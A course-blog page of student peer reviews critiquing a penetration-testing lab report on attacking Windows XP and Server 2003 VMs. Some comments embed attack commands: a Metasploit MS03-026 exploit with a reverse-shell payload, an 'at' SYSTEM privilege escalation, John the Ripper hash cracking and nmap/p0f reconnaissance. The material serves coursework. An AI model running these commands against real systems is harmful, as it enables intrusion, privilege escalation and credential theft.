April 23, 2025

10 thoughts on “TECH 581 W Computer Network Operations: Laboratory 6, Team 4”

  1. The abstract presented by team four explains what will be accomplished in the lab. It does not meet the length requirement of the syllabus; anything less than two paragraphs will be judged as poor scholarship. They explain how lab six will be the last “learning” lab. I disagree: performing a live penetration test in this setting is still a learning exercise and a capstone to the course.

     The literature review presented by team four is nothing more than an APA-cited list of reviewed articles. They have three extremely long paragraphs in their literature review with very few citations, which makes the review very hard to read and comprehend. Considering the entire literature review, team four does not present a review that is scholarly or academic. They do not show the overall state of the literature, nor do they do an effective job of tying the literature reviewed into the lab report process. The length of the literature review, however, is impressive.

     The methods section presented by team four does explain the process they will follow to complete the lab, though they list steps that should actually have been in the findings section. Team four decided to penetrate all of the Windows VMs that are part of our lab. Unlike the other teams, they do not even attempt to show anything related to the Linux machine in the lab environment. Because teams two, three, and five at least paid some respect to the Linux machine, this calls into question the results provided by team four. The methods section does a good job of explaining the how of what they will be performing, but it fails to mention the when, what, and why, which are very important parts of an academic and scholarly methodology. Team four explains that they used p0f and Ettercap to fingerprint their machines, but they fail to mention how they generated the packets used to actually fingerprint the machines (a sketch of what that might look like follows this comment). This is questionable.

     In the findings section of the lab they first list their lack of overall experience. This is a mistake, as that information should be in the issues section. The use of tools other than just Metasploit was a very nice touch, as most of the other teams worked only with Metasploit. They explain that because most exploits target the higher layers of the OSI model, organizations are concerned with protecting their data only at the higher layers. I have to disagree with that statement. Organizations are worried about the security of their information; the layers of the OSI model never come into the picture.

     The issues that team four list are very accurate and complete, unlike the issues presented by teams one and three. They actually list the inability to exploit two of their systems as an issue. Of course, they do list a lack of experience as one of their issues. I do not believe this should be the case: after performing enough research, and as we are reaching the end of this course, there should not be any issues as far as experience goes. I agree with team four's conclusions.
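
     For reference, a minimal sketch of how that packet generation might have looked with p0f, assuming the attack VM sits on the same segment (the interface name, addresses, and port are illustrative, not taken from the report):

         # p0f normally fingerprints hosts that initiate connections; with -A
         # it reads SYN+ACK replies instead, so the tester can provoke the
         # target into producing a fingerprintable packet
         p0f -A -i eth0 'host 192.168.1.10'

         # In a second shell, touch any listening port on the target so there
         # is a SYN+ACK for p0f to observe (port 135 as an example)
         nc -w 2 192.168.1.10 135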

  2. Group 4’s literature review, while quite lengthy, still doesn’t properly compare and contrast the literature to the lab activities. Each paper is given a paragraph that is, in most cases, a summary of the paper’s main ideas. The “Firewall Penetration Testing” paper was given a very extensive overview, but only one reference was made to the current lab.

    The methodologies section starts out with the group’s assessment of the security level of the versions of Windows they were going to test. XP SP0 was an obvious easy target, but Server 2003 was classified as less secure than XP SP3 with little reason given besides speculation as to the number of services that would be running on Server 2003. The operating system identification using passive reconnaissance tools was done with little detail using a tool called “p0f.” A link wasn’t provided so more information couldn’t be researched, but p0f is a passive fingerprinting tool that still needs traffic to observe, so I suspect the group had to generate that traffic actively. The group gave some details about their testing but missed some key details. Various exploits from Metasploit were tried, but which ones? The group appears to have taken the same approach to each system, which failed consistently. Sufficient research would have turned up a few sites with step-by-step instructions for compromising an XP SP0 machine using Metasploit. When attempting the Server 2003 machine, the group attempted to exploit ports 21, 135, 137, and 445, though they don’t give any detail on how they attempted to exploit them.
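
    As an example of what that research would have turned up, one commonly documented path against XP SP0 at the time was the MS03-026 DCOM exploit; a minimal sketch in msfconsole (the addresses are illustrative, not taken from the report):

        msfconsole
        msf > use exploit/windows/dcerpc/ms03_026_dcom
        msf > set RHOST 192.168.1.20   # the XP SP0 target (illustrative)
        msf > set PAYLOAD windows/meterpreter/reverse_tcp
        msf > set LHOST 192.168.1.5    # the attacker's address (illustrative)
        msf > exploit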

    The findings section is a bit confusing. At first look, it appears to be a summary of the methodologies, but while the methodologies make it sound like the XP SP0 machine was never compromised, the group says that they did compromise it using EZpwn. Also, the group mentions that they used Metasploit to exploit vulnerabilities in Server 2003, but none yielded any open sessions. If a session wasn’t opened, that means that the code injection didn’t work and the vulnerability wasn’t, in fact, exploited. The group mentions that they researched the open ports on the Server 2003 virtual machine but doesn’t mention any of the specific vulnerabilities they discovered. The group mentions the issue of exploitation up the OSI stack and identifies that compromises of lower levels will exploit higher levels. One issue I had with this section of the findings is the proposed solution. The group suggests encryption at every layer. How would the system react to a compromise of the encryption at one of the layers? Encryption can only do so much, and there must be trust between the layers that the lower layers have done their job. How would, for example, layer five understand that the IPsec policy on layer three had been compromised? Layer five doesn’t “speak” IP or IPsec; it trusts layer three to do that.
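
    For what it's worth, this is easy to check in Metasploit itself; a session list that comes back empty means no code execution was achieved:

        # After an exploit attempt, list open sessions; an empty list means
        # the payload never ran and the vulnerability was not exploited
        msf > sessions -l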

  3. I do not agree with the first few sentences of this team’s abstract. You do not need to get help to attack a target, nor do you need knowledge of the tools and how they work. Someone can just get their hands on the tools and start randomly attacking systems; knowledge is not needed at all. Break up the paragraphs. This way you would meet the required length of the abstract as per the requirements given to us. The literature review reads like a list. Compare and contrast the articles. Don’t just state your point; cite it, and state how it relates to the lab experiment. It is quite obvious that this lab report was written by multiple people. BREAK UP your paragraphs. Having one long paragraph makes it very difficult for the reader to continue reading and not lose interest. For having a lot of information from the articles, there are not many citations. These are needed, especially when taking material from the articles. Having no date for an article is NEVER an option. Use the Internet to find this information; your team is the only one that has no dates for its articles.
    The literature review is way too long. It is easily over the word count; too much of the lab report is the literature review. Why does the team think that SP0 will be the easiest to compromise while SP3 will be the hardest? I question how they could come up with that statement, especially when the team states that neither group member has done this before. Many of the teams did not have penetration testing experience, but they were still able to perform the lab experiment. The purpose of these labs is to teach the teams how to perform penetration testing. The team needed to go into more detail as to why they believe that exploiting the lower layers would make the next layer up more vulnerable. The lack of time should not be an issue. All teams had the same amount of time to perform the lab experiment, and they were able to get the lab experiment done. This team, like others, is disappointed that the exploits did not work for some of their environment. Failure is always an option. These labs should be teaching the teams how to perform penetration testing and how to protect systems properly.

  4. Team 4 began their lab report with an abstract introducing this lab assignment. They state that their objective for this lab is to use tools to determine the vulnerabilities of a target system, and then use tools to try to penetrate the target system.

    Team 4 begins their literature review section by discussing Mobile Test: a Tool Supporting Automatic Black Box Tests for Software on Mobile Devices. They related the layer design of Mobile Test to the layer design we have been using to classify vulnerabilities by the OSI model. This seemed to be an interesting comparison.

    They continue their literature review with Firewall Penetration Testing (Haeni, 1997). They discuss who should perform the testing. They state that testing should be done by “independent groups that could be trusted for integrity, experience, writhing skills and technical capabilities and not vendors or hackers”. Although I agree with this statement, they used the word “writhing” where I believe they meant to use the term “writing”. There were a few other misspellings throughout the document; however, I used this as an example. They proceed with the types of testing and the steps involved in testing. They related these types of testing and steps to our current laboratory assignment.

    Next, team 4 discussed Ethical Hacking and Password Cracking: a Pattern for Individualized Security Exercises (Snyder, 2006). They discussed how passwords can be hashed by algorithms such as SHA-1. They also discussed password-cracking programs such as John the Ripper. I believe that they did find a misstatement by the author of this article: “If the password is easily guessed, the password is secure.” It would seem reasonable that if the password can be easily guessed, then it is not secure.
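
    To make the mechanics concrete, here is a minimal sketch of hashing and cracking, assuming a John the Ripper build that supports the raw-sha1 format (the hash file and wordlist path are illustrative):

        # Produce an unsalted SHA-1 hash of a candidate password
        echo -n 'Password1' | sha1sum

        # Run John the Ripper in wordlist mode against a file of such hashes
        john --format=raw-sha1 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt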

    Team 4 also reviewed A Distributed Network Security Assessment Tool with Vulnerability Scan and Penetration Test (Chen, Yang, Lan, 2007). They began this review by stating, “Penetration testing relies heavily on tools to accomplish its tasks, the more tools that are available the better the testers are for finding vulnerabilities.” I don’t necessarily agree with this statement; I believe that the knowledge of the tester is the key, not the number of tools that are available. I found it ironic that team 4 states that the article was designed to advertise a particular piece of software and that caution needs to be taken in reading the article; however, they state at the end that the author of the article does not give the name of the software or where it can be obtained. This is either very poor marketing on the part of the author of the article, or the article was meant to document their work and not meant as an advertisement.

    In the methodology section, Team 4 discussed the methods that they used for conducting the testing and the results of the testing. They used p0f and Ettercap to determine the operating system. They also used EZpwn, Fast-Track, and various tools within the Metasploit framework to attempt to gain access, but had negative results. They then used Zenmap and Nessus to try to uncover any further vulnerabilities, but again had negative results. In their results section they basically restate the methods and the results that they stated in the methods section.
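
    As a point of reference, Zenmap is just a GUI over Nmap, so the equivalent active discovery step can be sketched on the command line (the target address is illustrative):

        # Active service and OS detection; -O requires root privileges
        nmap -sS -sV -O 192.168.1.20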

  5. Team 4 did a nice job with their abstract in that it detailed what they intended to do in lab 6 and also tied this lab back to previous labs. Their literature review, however, read like a list and summary of the articles and didn’t compare and contrast the literature to the lab activities.
    The methods section starts out reiterating what they discussed in their abstract. After that they explain the process they will follow to complete the lab. However, some of this information should have been in their results section. The methods section does a good job of explaining how they plan to perform their testing. Team 4 gave some details about their testing but missed some key details. Several exploits from Metasploit were tried, but which ones? Team 4 failed consistently on many of their attempts but were honest enough to admit that this was due to a lack of experience. However, the purpose of these labs is to teach us how to perform penetration testing and how to protect systems properly. Hopefully team 4 will use this exercise as a learning experience and be able to apply it in the next lab exercise. Team 4 could have gone into more detail as to why they believe that exploiting the lower layers would make the next layer up more vulnerable.
    Team 4 had a great deal of issues, many being just the time it took to install and use the selected tools. The lack of time should not be an issue; all teams had the same amount of time to perform the lab experiment, and they were able to get the lab experiment done. Team 4, like others, was disappointed that their exploits did not work for some of their environments, but that is part of the learning process. Figure out what went wrong, make adjustments, and try it again.

  6. The team starts with their abstract explaining what they are going to do in this week’s lab. The abstract also had a couple of sentences that repeated what had already been said. Next the team goes into the literature review. They again went with separate reviews for each article. The first article did not have any response as to how it relates to the lab, nor any arguments for or against it. The second article likewise just gives an overview of what was discussed within the article, with no relation to the lab or any discussion about the article. The team continues through the other articles in the same fashion.

     They then go on to the methodology section and explain what is going to occur in the hands-on portion of the lab. When reading through the methodologies there were many items that belong in the results section of the lab, for example when the team discusses how long it took to exploit some of the vulnerabilities. This does not mean the team could not go into detail on what they were attempting to do, but many times it felt as if the methodology and results sections were merged. The next section was the results section. It was almost as if the team members divided the methodology and results sections between themselves and did not collaborate to go over and refine them. Again there was repetition of information that had been discussed previously. This makes the lab hard to read and disorganized. The first paragraph of the results section would have made a good start for their conclusions rather than where it was placed.

     Next the team goes on to discuss the issues they had. Some of the issues were the time they had to spend learning to use the tools to exploit the system. What they did not put in this section, though they talked about it earlier in the lab, was the experience they have with penetration testing. They could have included that within this section and taken it out of the others. They then go on to give their conclusion, which went over what happened during the lab overall.

     They then discuss exploits via the use of “script kiddie” tools. Yes, some of these tools do make it seem simple to exploit a system, but there are tools that actually require knowledge of what the user is going to exploit before running the tool. When script kiddies run a tool, they do not create a plan before an attack; they simply run the tools against any system. This should make the team rethink some of the terminology that gets thrown around. Yes, there is no elite creation of tools within the environment, but that does not render most of the tools used mere point-and-click attacks. Also, if some of the tools did not work, that should have been put into the issues section along with an explanation of why they did not work. Was it because the tool was coded wrong, or because of inexperience with the tools? Overall they did what they needed for the lab, but the write-up needs to be more organized.

  7. I found a few noteworthy things concerning team four’s lab write-up. The literature review was, at the very least, quite lengthy. I must admit I find this team’s commitment to results, demonstrated by the time spent on running exploits, to be admirable. Furthermore, I was intrigued by the fact that some local exploits were attempted: an interesting detail (although specifics were lacking; I assume that the ‘at’ system privilege escalation attack was employed, sketched below). Finally, I agreed with the discussion on the OSI layer compromising, and appreciated the reference to encryption.
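
    For readers unfamiliar with that attack, a sketch of its usual form on XP-era Windows follows; this is my assumption of what was attempted, not a detail from the report (the time is illustrative):

        REM The at scheduler service runs jobs as SYSTEM on older Windows;
        REM scheduling an interactive cmd.exe one minute ahead therefore
        REM yields a SYSTEM shell
        at 13:01 /interactive cmd.exe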

    It must be admitted that a fair number of problems are present with this team’s report; many are somewhat trivial, but more than a few are serious. The literature review, despite its length, is flawed in style, formatting, and content. The review section was painful to read, due to ‘huge’ paragraph groupings. Furthermore, the use of the phrase “the author” became monotonous to the point of distraction. Continuing, despite the rather lengthy body of writing, almost nothing more than summary information was presented. Finally, very few references were actually made: the massive paragraph on the first paper made no use of citation, other than to introduce the paper. This team should improve its literature review techniques in the future.

    Furthermore, I found it troubling that this team spent so much time defeating the Windows XP SP0 host. Admittedly, it is worthwhile to experiment with tools, but this length of time appeared to proceed out of difficulty cracking the machine, and not necessarily thoroughness. I would ask: did this team read other teams’ prior lab exercises? I have found other teams’ research nearly as valuable as my own, as it becomes a body of knowledge upon which to draw when designing experimental setups. As it was well reported that certain specific exploits were known to work against XP SP0, the approach this team took of throwing exploits at the host until one stuck seemed not only a waste of time, but under-researched as well. I would suggest that a smart and efficient approach is the definition of professionalism: leveraging both your own prior research and that of others in the field is necessary. I would recommend that team four consider this in the implementation of future methods.

    It is also disturbing that this team asserts that they had no real experience with the penetration tools. I ask: what did you do for the last five lab exercises? Some of these prior exercises required testing of exploits; if you did not do these exploit tests, then it seems inappropriate to raise the issue of inexperience, as it is self-inflicted. Closely related to this, this team did not really use passive methods for the first two hosts, as it is apparent that a type of active scanning was performed which utilized repeated attempts of various exploits. Conceivably, the target will be alerted within a few attempts: this is a far cry from a quick and effective surgical strike based on effective passive reconnaissance. In this, I do not believe this team really fulfilled the goals of the laboratory exercise.

    Finally, I found that the answers to the laboratory questions were quite brief. While a few good points were raised, no evidence or logic was presented to substantiate these claims. This team asserts that “organizations are more concentrated on securing the upper layers” rather than the lower OSI layers. This is a statement which requires explanation, as I am not convinced it is universally true. For instance, in the older UNIX paradigm, I feel there is much evidence to indicate that system administrators concern themselves mainly with the lower network layers rather than user applications. It appears that security policies may vary substantially based on the operating system deployed on the network clients.

  8. I think that group 4’s write-up for lab 6 was fair. The abstract for this lab was adequate and provided a short overview of the lab. The literature review was good and adequately reviewed the material. Group 4 answered all of the required questions for each reading. All of the citing for the literature review was done well, and all of the pages were included. For this lab, the group answered all of the required questions and provided a good amount of detail about the steps they used to attempt to exploit a system. One part that confused me read as follows: “The group also manually tried various exploits from Metasploit to try and gain access to the Windows XP SP0 operating system. This process took almost all of a day to accomplish.” Almost all of the Windows exploits should work on this system; I find it hard to believe that this task should take longer than 20 minutes, including researching how to use Metasploit and researching an applicable exploit. Also, the group did not explain the passive OS findings well. They indicated that Server 2003 came up as Windows 2000 SP4, which is not the same OS at all. What would happen if one were to attack a system using an exploit for one OS when it’s really another? Could this raise awareness and potentially ruin all of the passive scanning done? Finally, the conclusion was adequate and summarizes what was covered.

  9. The team starts out with a strong abstract and provides a well-written literature review. The team used a combination of tools such as EZpwn, Fast-Track, Ettercap, and p0f to attempt to exploit their selected target machines. It seems as if the team had difficulty attempting to identify the specific operating system using certain tools. Often reading the manual that is available in BackTrack can help: type man “name of tool” in a shell. It also seems as if Ettercap gave false readings for most of your tests, which is similar to other groups’ findings. Was Metasploit Framework updated before the tests were done, or did this happen during the test? It seemed it was updated while testing the Windows XP SP3 machine. Similar to other groups, the Windows XP SP3 system was difficult to exploit, mainly because this machine is up to date with patches. The Windows XP SP0 seemed to be the easier of the systems to exploit when comparing the results to the other teams. It seems like all teams picked XP SP0, mainly because there are known exploits for this system, which is the reason for service pack releases.
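
    To make that tip concrete (the tool names here are just the ones mentioned above):

        # Consult the manual pages bundled with BackTrack
        man ettercap
        man p0f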

  10. Team four’s offering is generally improved over previous weeks but still could use some work.

    The abstract vaguely describes the experiment. Are premade tools the only means for penetration testing? Is lab seven really about gaining access to the system, or is there more to it? If the pedagogy calls for the labs to build on each other, do you really need to mention it in the abstract?

    The literature review gives exhaustive summaries of the articles that make the report painful to read. While the team makes an attempt to relate the articles back to the labs, it is cursory at best. Little if any evaluative content suggests a lack of comprehension, effort, or both.

    The group’s methods section contains a good amount of detail, but more specifics would make it easier to repeat. If the literature review is a mandatory section of the assignment, does it need to be mentioned in the methods section? There is data in this section that belongs in findings. Why did it take all day to crack XP SP0? What finally worked? Why didn’t it work with Service Pack 3? Why did you attempt random ports with Server 2003? Did you attempt to fingerprint any of the systems first? Why do you think you didn’t succeed?
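
    A targeted probe first would have answered several of these questions; a minimal sketch against the ports the group attacked (the address is illustrative):

        # Enumerate the services behind the attacked ports before choosing
        # exploits, instead of trying ports blindly
        nmap -sV -p 21,135,137,445 192.168.1.30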

    In your results section, you state that the team has a lack of penetration testing experience. This belongs in the issues section, but do you feel the other groups have an unfair advantage? Your findings give me an accurate picture of what the group was able to achieve, though there is information that really belongs in the methods section. The tools operate at the upper layers, but is that where they actually attack?

    In the group’s issues section you state that a lot of time was eaten up by learning the tools. Shouldn’t you have been doing this all along? You claim a lack of knowledge as a hindrance. This is a graduate level class. You must be adaptable and learn to cover gaps in knowledge on the fly.

    The group’s conclusion summarizes the methods, and states that they learned the ways of trial and error. Will the same tools that worked here always work? What about the tools that failed? Is there anything special about this environment that might have affected the outcome?
